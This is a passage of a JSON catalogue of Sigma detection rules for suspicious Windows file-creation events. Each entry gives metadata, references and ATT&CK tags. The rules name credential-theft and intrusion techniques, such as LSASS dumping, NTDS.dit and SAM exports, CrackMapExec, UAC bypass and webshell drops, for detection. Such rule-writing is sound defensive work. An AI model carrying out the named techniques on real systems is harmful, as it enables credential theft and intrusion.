Setup.exe) fail to run for any reason.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_errorhandler_persistence.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/last-byte/PersistenceSniper", "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "15904280-565c-4b73-9303-3291f964e7f9", "value": "Potential Persistence Attempt Via ErrorHandler.Cmd" }, { "description": "Detects the creation of files with an \"LNK\" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the \"LNK\" extension by default.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2022-11-07", "falsepositive": [ "Some tuning is required for other general purpose directories of third party apps" ], "filename": "file_event_win_susp_lnk_double_extension.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://twitter.com/luc4m/status/1073181154126254080", "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.007" ] }, "related": [ { "dest-uuid": 
"11f29a39-0942-4d62-92b6-fe236cf3066e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", "value": "Suspicious LNK Double Extension File Created" }, { "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon parent process or directory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ntds_dit_uncommon_parent_process.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "value": "NTDS.DIT Creation By Uncommon Parent Process" }, { "description": "Detects the creation of files with an executable or script extension by an Office application.", "meta": { "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_office_susp_file_extension.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ 
"https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml" ], "tags": [ "attack.t1204.002", "attack.execution" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "value": "File With Uncommon Extension Created By An Office Application" }, { "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", "meta": { "author": "elhoim", "creation_date": "2022-04-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_creation_by_mobsync.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-november-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml" ], "tags": [ "attack.t1055", "attack.t1218", "attack.execution", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832", "value": "Created Files by Microsoft Sync Center" }, { "description": "Detects file creation events with filename patterns used by CrackMapExec.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-03-11", 
"falsepositive": [ "Unknown" ], "filename": "file_event_win_hktl_crackmapexec_indicators.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/CrackMapExec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_crackmapexec_indicators.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "736ffa74-5f6f-44ca-94ef-1c0df4f51d2a", "value": "HackTool - CrackMapExec File Indicators" }, { "description": "Detects the creation of files with scripting or executable extensions by Mysql daemon.\nWhich could be an indicator of \"User Defined Functions\" abuse to download malware.\n", "meta": { "author": "Joseph Kamau", "creation_date": "2024-05-27", "falsepositive": [ "Unknown" ], "filename": "file_event_win_mysqld_uncommon_file_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://asec.ahnlab.com/en/58878/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mysqld_uncommon_file_creation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c61daa90-3c1e-4f18-af62-8f288b5c9aaf", "value": "Uncommon File Creation By Mysql Daemon Process" }, { "description": "Detects files written by the different tools that exploit HiveNightmare", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-23", "falsepositive": [ "Files that accidentally contain these strings" ], "filename": "file_event_win_hktl_hivenightmare_file_exports.yml", "level": "high", "logsource.category": "file_event", "logsource.product": 
"windows", "refs": [ "https://github.com/FireFart/hivenightmare/", "https://github.com/GossiTheDog/HiveNightmare", "https://twitter.com/cube0x0/status/1418920190759378944", "https://github.com/WiredPulse/Invoke-HiveNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001", "cve.2021-36934" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "value": "HackTool - Typical HiveNightmare SAM File Export" }, { "description": "Detects the creation of a macro file for Outlook.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_office_outlook_susp_macro_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1137", "attack.t1008", "attack.t1546" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "117d3d3a-755c-4a61-b23e-9171146d094c", "value": "Suspicious Outlook Macro Created" }, { "description": "Detects the creation of files with the \".rdp\" extensions in the temporary directory that Outlook uses when opening attachments.\nThis can be used to detect spear-phishing campaigns that use RDP files as attachments.\n", "meta": { "author": "Florian Roth", "creation_date": "2024-11-01", "falsepositive": [ "Whenever someone receives an RDP file as an email attachment and decides to save or open it right from the attachments" ], "filename": "file_event_win_office_outlook_rdp_file_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29", "https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/", "https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_rdp_file_creation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f748c45a-f8d3-4e6f-b617-fe176f695b8f", "value": ".RDP File Created by Outlook Process" }, { "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_dotnet_profiler.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", "value": "UAC Bypass Using .NET Code Profiler on MMC" }, { "description": "Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_recycle_bin_fake_exec.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/", "https://www.mandiant.com/resources/blog/infected-usb-steal-secrets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca", "value": "Suspicious File Creation Activity From Fake Recycle.Bin Folder" }, { "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", "meta": { "author": "@pbssubhash", "creation_date": "2022-12-08", "falsepositive": [ "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "filename": "file_event_win_lsass_shtinkering.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f625", "value": "LSASS Process Dump Artefact In CrashDumps Folder" }, { "description": "Detects the creation of the default output filename used by the wmiexec tool", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-02", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_wmiexec_default_filename.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" ], "tags": [ "attack.lateral-movement", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "value": "Wmiexec Default Output File" }, { "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", "meta": { "author": "@sam0x90", "creation_date": "2022-07-30", "falsepositive": [ "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "filename": "file_event_win_iso_file_mount.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://twitter.com/Sam0x90/status/1552011547974696960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", "value": "ISO File Created Within Temp Folders" }, { "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_spool_drivers_color_drop.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "value": "Drop Binaries Into Spool Drivers Color Folder" }, { "description": "Detects suspicious file type dropped by an Exchange component in IIS", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-04", "falsepositive": [ "Unknown" ], "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ "attack.persistence", "attack.t1190", "attack.initial-access", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", "value": "Suspicious File Drop by Exchange" }, { "description": "Detects the creation of the LiveKD driver, which is used for live kernel debugging", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "Legitimate usage of LiveKD for debugging purposes will also 
trigger this" ], "filename": "file_event_win_sysinternals_livekd_driver.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "16fe46bb-4f64-46aa-817d-ff7bec4a2352", "value": "LiveKD Driver Creation" }, { "description": "Detects the creation of the default dump file used by the Outflank Dumpert tool, a process dumper which dumps the LSASS process memory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-02-04", "falsepositive": [ "Very unlikely" ], "filename": "file_event_win_hktl_dumpert.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_dumpert.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "value": "HackTool - Dumpert Process Dumper Default File" }, { "description": "Detects the creation of an \"Active Directory Schema Cache File\" (.sch) file by an uncommon tool.", "meta": { "author": "xknow @xknow_infosec, Tim Shelton", "creation_date": "2019-03-24", "falsepositive": [ "Other legitimate tools which perform ADSI (LDAP) operations, e.g. any remoting activity by MMC, PowerShell, Windows etc."
], "filename": "file_event_win_adsi_cache_creation_by_uncommon_tool.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/fox-it/LDAPFragger", "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml" ], "tags": [ "attack.t1001.003", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "value": "ADSI-Cache File Creation By Uncommon Tool" }, { "description": "Detects the creation of new Office macro files on the system", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-23", "falsepositive": [ "Very common in environments that rely heavily on macro documents" ], "filename": "file_event_win_office_macro_files_created.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91174a41-dc8f-401b-be89-7bfc140612a0", "value": "Office Macro File Creation" }, {
"description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "creation_date": "2022-12-16", "falsepositive": [ "Unknown" ], "filename": "file_event_win_system32_local_folder_privilege_escalation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "07a99744-56ac-40d2-97b7-2095967b0e03", "value": "Potential Privilege Escalation Attempt Via .Exe.Local Technique" }, { "description": "Detects the creation of hidden file/folder with the \"::$index_allocation\" stream. 
This can be used as a technique to prevent access to folders and files from tooling such as \"explorer.exe\" and \"powershell.exe\"\n", "meta": { "author": "Scoubi (@ScoubiMtl)", "creation_date": "2023-10-09", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_susp_hidden_dir_index_allocation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/", "https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/", "https://twitter.com/pfiatde/status/1681977680688738305", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3", "https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a8f866e1-bdd4-425e-a27a-37619238d9c7", "value": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream" }, { "description": "Get-Variable is a valid PowerShell cmdlet.\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for a Get-Variable executable in the path and executes the malicious binary instead of the PowerShell cmdlet.\n", "meta": { "author": "frack113", "creation_date": "2022-04-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_get_variable.yml", "level": "high", "logsource.category": "file_event",
"logsource.product": "windows", "refs": [ "https://www.joesandbox.com/analysis/465533/0/html", "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" ], "tags": [ "attack.persistence", "attack.t1546", "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "value": "Suspicious Get-Variable.exe Creation" }, { "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", "meta": { "author": "Tim Shelton", "creation_date": "2022-01-10", "falsepositive": [ "Unknown" ], "filename": "file_event_win_cscript_wscript_dropper.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "value": "WScript or CScript Dropper - File" }, { "description": "Detects dropped files with double extensions, which is 
often used by malware as a method to abuse the fact that Windows hide default extensions by default.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2022-06-19", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_susp_double_extension.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://twitter.com/luc4m/status/1073181154126254080", "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.007" ] }, "related": [ { "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "value": "Suspicious Double Extension Files" }, { "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. 
This may indicate an attempt to load a malicious module via DLL search order hijacking.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" ], "tags": [ "attack.t1566", "attack.t1566.001", "attack.initial-access", "attack.t1574", "attack.t1574.001", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "value": "Potential Initial Access via DLL Search Order Hijacking" }, { "description": "Detects suspicious files created via the OneNote application. 
This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-09", "falsepositive": [ "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "filename": "file_event_win_office_onenote_susp_dropped_files.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/", "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", "https://labs.withsecure.com/publications/detecting-onenote-abuse", "https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://twitter.com/MaD_c4t/status/1623414582382567424", 